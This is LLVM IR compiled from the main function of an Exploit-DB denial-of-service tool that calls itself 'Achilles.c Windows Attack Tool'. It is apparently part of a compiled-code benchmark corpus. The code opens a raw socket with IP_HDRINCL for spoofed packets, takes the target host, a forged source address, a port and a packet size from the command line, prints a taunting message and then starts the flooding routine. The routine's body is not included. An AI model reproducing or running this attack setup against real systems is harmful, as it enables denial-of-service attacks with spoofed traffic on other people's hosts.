; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_28263.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_28263.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [32 x i8] c"Achilles.c Windows Attack Tool\0A\00", align 1
@PF_INET = common dso_local global i32 0, align 4
@SOCK_RAW = common dso_local global i32 0, align 4
@IPPROTO_RAW = common dso_local global i32 0, align 4
@sock = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [7 x i8] c"socket\00", align 1
@IPPROTO_IP = common dso_local global i32 0, align 4
@IP_HDRINCL = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [11 x i8] c"setsockopt\00", align 1
@.str.3 = private unnamed_addr constant [15 x i8] c"\0AFinding host\0A\00", align 1
@stdout = common dso_local global i32 0, align 4
@radd = common dso_local global i8* null, align 8
@bgport = common dso_local global i8* null, align 8
@bgsize = common dso_local global i8* null, align 8
@sradd = common dso_local global i8* null, align 8
@.str.4 = private unnamed_addr constant [77 x i8] c"Achilles: Before my time is done I will look down on your corpse and smile.\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 1, i32* %6, align 4
  %7 = call i32 @printf(i8* getelementptr inbounds ([32 x i8], [32 x i8]* @.str, i64 0, i64 0))
  %8 = load i32, i32* @PF_INET, align 4
  %9 = load i32, i32* @SOCK_RAW, align 4
  %10 = load i32, i32* @IPPROTO_RAW, align 4
  %11 = call i32 @socket(i32 %8, i32 %9, i32 %10)
  store i32 %11, i32* @sock, align 4
  %12 = icmp slt i32 %11, 0
  br i1 %12, label %13, label %16

13:                                               ; preds = %2
  %14 = call i32 @perror(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0))
  %15 = call i32 @exit(i32 1) #3
  unreachable

16:                                               ; preds = %2
  %17 = call i32 (...) @getgid()
  %18 = call i32 @setgid(i32 %17)
  %19 = call i32 (...) @getuid()
  %20 = call i32 @setuid(i32 %19)
  %21 = load i32, i32* %4, align 4
  %22 = icmp slt i32 %21, 4
  br i1 %22, label %23, label %28

23:                                               ; preds = %16
  %24 = load i8**, i8*** %5, align 8
  %25 = getelementptr inbounds i8*, i8** %24, i64 0
  %26 = load i8*, i8** %25, align 8
  %27 = call i32 @usage(i8* %26)
  br label %28

28:                                               ; preds = %23, %16
  %29 = load i32, i32* @sock, align 4
  %30 = load i32, i32* @IPPROTO_IP, align 4
  %31 = load i32, i32* @IP_HDRINCL, align 4
  %32 = bitcast i32* %6 to i8*
  %33 = call i64 @setsockopt(i32 %29, i32 %30, i32 %31, i8* %32, i32 4)
  %34 = icmp slt i64 %33, 0
  br i1 %34, label %35, label %38

35:                                               ; preds = %28
  %36 = call i32 @perror(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.2, i64 0, i64 0))
  %37 = call i32 @exit(i32 1) #3
  unreachable

38:                                               ; preds = %28
  %39 = call i32 @time(i32* null)
  %40 = call i32 (...) @getpid()
  %41 = xor i32 %39, %40
  %42 = sext i32 %41 to i64
  %43 = call i64 (...) @getppid()
  %44 = add nsw i64 %42, %43
  %45 = call i32 @srand(i64 %44)
  %46 = call i32 @printf(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.3, i64 0, i64 0))
  %47 = load i32, i32* @stdout, align 4
  %48 = call i32 @fflush(i32 %47)
  %49 = load i8**, i8*** %5, align 8
  %50 = getelementptr inbounds i8*, i8** %49, i64 1
  %51 = load i8*, i8** %50, align 8
  %52 = call i8* @lookup(i8* %51)
  store i8* %52, i8** @radd, align 8
  %53 = load i8**, i8*** %5, align 8
  %54 = getelementptr inbounds i8*, i8** %53, i64 3
  %55 = load i8*, i8** %54, align 8
  %56 = call i8* @atoi(i8* %55)
  store i8* %56, i8** @bgport, align 8
  %57 = load i8**, i8*** %5, align 8
  %58 = getelementptr inbounds i8*, i8** %57, i64 4
  %59 = load i8*, i8** %58, align 8
  %60 = call i8* @atoi(i8* %59)
  store i8* %60, i8** @bgsize, align 8
  %61 = load i8**, i8*** %5, align 8
  %62 = getelementptr inbounds i8*, i8** %61, i64 2
  %63 = load i8*, i8** %62, align 8
  %64 = call i8* @lookup(i8* %63)
  store i8* %64, i8** @sradd, align 8
  %65 = call i32 @printf(i8* getelementptr inbounds ([77 x i8], [77 x i8]* @.str.4, i64 0, i64 0))
  %66 = call i32 (...) @flooder()
  ret i32 0
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @socket(i32, i32, i32) #1

declare dso_local i32 @perror(i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @setgid(i32) #1

declare dso_local i32 @getgid(...) #1

declare dso_local i32 @setuid(i32) #1

declare dso_local i32 @getuid(...) #1

declare dso_local i32 @usage(i8*) #1

declare dso_local i64 @setsockopt(i32, i32, i32, i8*, i32) #1

declare dso_local i32 @srand(i64) #1

declare dso_local i32 @time(i32*) #1

declare dso_local i32 @getpid(...) #1

declare dso_local i64 @getppid(...) #1

declare dso_local i32 @fflush(i32) #1

declare dso_local i8* @lookup(i8*) #1

declare dso_local i8* @atoi(i8*) #1

declare dso_local i32 @flooder(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
